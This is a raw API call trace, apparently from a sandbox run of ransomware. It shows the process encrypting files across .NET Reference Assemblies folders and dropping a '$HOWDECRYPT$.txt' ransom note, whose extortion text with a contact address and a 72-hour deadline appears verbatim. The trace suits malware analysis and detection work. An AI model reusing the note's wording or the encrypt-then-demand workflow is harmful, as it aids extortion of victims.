1 [0162.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.componentmodel.dataannotations.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.369] GetProcessHeap () returned 0x2c0000 [0162.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.369] GetProcessHeap () returned 0x2c0000 [0162.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e888e8 | out: hHeap=0x2c0000) returned 1 [0162.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7e8 | out: pbBuffer=0x248e7e8) returned 1 [0162.369] GetProcessHeap () returned 0x2c0000 [0162.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.370] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7e0*=0x30) returned 1 [0162.370] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.370] GetProcessHeap () returned 0x2c0000 [0162.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.370] GetProcessHeap () returned 0x2c0000 [0162.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eae2b8 | out: hHeap=0x2c0000) returned 1 [0162.370] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7e8 | out: pbBuffer=0x248e7e8) returned 1 [0162.370] GetProcessHeap () returned 0x2c0000 [0162.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.370] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7e0*=0x30) returned 1 [0162.370] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.contract.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.370] GetProcessHeap () returned 0x2c0000 [0162.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.370] GetProcessHeap () returned 0x2c0000 [0162.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9b68 | out: hHeap=0x2c0000) returned 1 [0162.370] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\subsetlist\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.371] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.371] WriteFile (in: hFile=0x178, lpBuffer=0x248e717*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e840, lpOverlapped=0x0 | out: lpBuffer=0x248e717*, lpNumberOfBytesWritten=0x248e840*=0x127, lpOverlapped=0x0) returned 1 [0162.372] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.372] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e840, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e840*=0x2ac, lpOverlapped=0x0) returned 1 [0162.372] CloseHandle (hObject=0x178) returned 1 [0162.372] GetProcessHeap () returned 0x2c0000 [0162.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9a50 | out: hHeap=0x2c0000) returned 1 [0162.372] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7e0 | out: pbBuffer=0x248e7e0) returned 1 [0162.373] GetProcessHeap () returned 0x2c0000 [0162.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.373] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7d8*=0x30) returned 1 [0162.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\subsetlist\\client.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.373] GetProcessHeap () returned 0x2c0000 [0162.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.373] GetProcessHeap () returned 0x2c0000 [0162.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaa920 | out: hHeap=0x2c0000) returned 1 [0162.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.374] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.374] WriteFile (in: hFile=0x178, lpBuffer=0x248e70f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e838, lpOverlapped=0x0 | out: lpBuffer=0x248e70f*, lpNumberOfBytesWritten=0x248e838*=0x127, lpOverlapped=0x0) returned 1 [0162.374] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.375] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e838, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e838*=0x2ac, lpOverlapped=0x0) returned 1 [0162.375] CloseHandle (hObject=0x178) returned 1 [0162.375] GetProcessHeap () returned 0x2c0000 [0162.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9938 | out: hHeap=0x2c0000) returned 1 [0162.375] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7d8 | out: pbBuffer=0x248e7d8) returned 1 [0162.375] GetProcessHeap () returned 0x2c0000 [0162.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.375] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7d0*=0x30) returned 1 [0162.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.375] GetProcessHeap () returned 0x2c0000 [0162.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.375] GetProcessHeap () returned 0x2c0000 [0162.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9820 | out: hHeap=0x2c0000) returned 1 [0162.375] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7d0 | out: pbBuffer=0x248e7d0) returned 1 [0162.376] GetProcessHeap () returned 0x2c0000 [0162.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.376] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7c8*=0x30) returned 1 [0162.376] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.visualc.stlclr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.376] GetProcessHeap () returned 0x2c0000 [0162.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.376] GetProcessHeap () returned 0x2c0000 [0162.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9708 | out: hHeap=0x2c0000) returned 1 [0162.376] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7d0 | out: pbBuffer=0x248e7d0) returned 1 [0162.376] GetProcessHeap () returned 0x2c0000 [0162.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.376] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7c8*=0x30) returned 1 [0162.376] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.utilities.v3.5.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.376] GetProcessHeap () returned 0x2c0000 [0162.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.376] GetProcessHeap () returned 0x2c0000 [0162.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ead528 | out: hHeap=0x2c0000) returned 1 [0162.377] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7c8 | out: pbBuffer=0x248e7c8) returned 1 [0162.377] GetProcessHeap () returned 0x2c0000 [0162.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.377] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7c0*=0x30) returned 1 [0162.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.framework.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.377] GetProcessHeap () returned 0x2c0000 [0162.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.377] GetProcessHeap () returned 0x2c0000 [0162.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec95f0 | out: hHeap=0x2c0000) returned 1 [0162.377] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7c8 | out: pbBuffer=0x248e7c8) returned 1 [0162.377] GetProcessHeap () returned 0x2c0000 [0162.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.377] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7c0*=0x30) returned 1 [0162.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.engine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.378] GetProcessHeap () returned 0x2c0000 [0162.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.378] GetProcessHeap () returned 0x2c0000 [0162.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec94d8 | out: hHeap=0x2c0000) returned 1 [0162.378] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7c0 | out: pbBuffer=0x248e7c0) returned 1 [0162.378] GetProcessHeap () returned 0x2c0000 [0162.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.378] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7b8*=0x30) returned 1 [0162.378] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.conversion.v3.5.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.378] GetProcessHeap () returned 0x2c0000 [0162.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.378] GetProcessHeap () returned 0x2c0000 [0162.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ead400 | out: hHeap=0x2c0000) returned 1 [0162.378] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7c0 | out: pbBuffer=0x248e7c0) returned 1 [0162.378] GetProcessHeap () returned 0x2c0000 [0162.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.378] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7b8*=0x30) returned 1 [0162.378] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.379] GetProcessHeap () returned 0x2c0000 [0162.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.379] GetProcessHeap () returned 0x2c0000 [0162.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eae0b8 | out: hHeap=0x2c0000) returned 1 [0162.379] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7b8 | out: pbBuffer=0x248e7b8) returned 1 [0162.379] GetProcessHeap () returned 0x2c0000 [0162.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.379] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7b0*=0x30) returned 1 [0162.379] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationtypes.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.379] GetProcessHeap () returned 0x2c0000 [0162.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.379] GetProcessHeap () returned 0x2c0000 [0162.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaa818 | out: hHeap=0x2c0000) returned 1 [0162.379] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7b8 | out: pbBuffer=0x248e7b8) returned 1 [0162.379] GetProcessHeap () returned 0x2c0000 [0162.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.379] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7b0*=0x30) returned 1 [0162.380] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.380] GetProcessHeap () returned 0x2c0000 [0162.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.380] GetProcessHeap () returned 0x2c0000 [0162.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec92a8 | out: hHeap=0x2c0000) returned 1 [0162.380] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7b0 | out: pbBuffer=0x248e7b0) returned 1 [0162.380] GetProcessHeap () returned 0x2c0000 [0162.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.380] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7a8*=0x30) returned 1 [0162.380] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclientsideproviders.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.380] GetProcessHeap () returned 0x2c0000 [0162.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.380] GetProcessHeap () returned 0x2c0000 [0162.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ead2d8 | out: hHeap=0x2c0000) returned 1 [0162.380] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7b0 | out: pbBuffer=0x248e7b0) returned 1 [0162.380] GetProcessHeap () returned 0x2c0000 [0162.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.380] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7a8*=0x30) returned 1 [0162.381] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.381] GetProcessHeap () returned 0x2c0000 [0162.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.381] GetProcessHeap () returned 0x2c0000 [0162.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaa710 | out: hHeap=0x2c0000) returned 1 [0162.381] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7a8 | out: pbBuffer=0x248e7a8) returned 1 [0162.381] GetProcessHeap () returned 0x2c0000 [0162.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.381] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7a0*=0x30) returned 1 [0162.381] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.runtime.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.381] GetProcessHeap () returned 0x2c0000 [0162.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.381] GetProcessHeap () returned 0x2c0000 [0162.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9190 | out: hHeap=0x2c0000) returned 1 [0162.381] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7a8 | out: pbBuffer=0x248e7a8) returned 1 [0162.381] GetProcessHeap () returned 0x2c0000 [0162.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.382] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7a0*=0x30) returned 1 [0162.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.componentmodel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.382] GetProcessHeap () returned 0x2c0000 [0162.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.382] GetProcessHeap () returned 0x2c0000 [0162.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ead1b0 | out: hHeap=0x2c0000) returned 1 [0162.382] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7a0 | out: pbBuffer=0x248e7a0) returned 1 [0162.382] GetProcessHeap () returned 0x2c0000 [0162.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.382] CryptEncrypt (in: 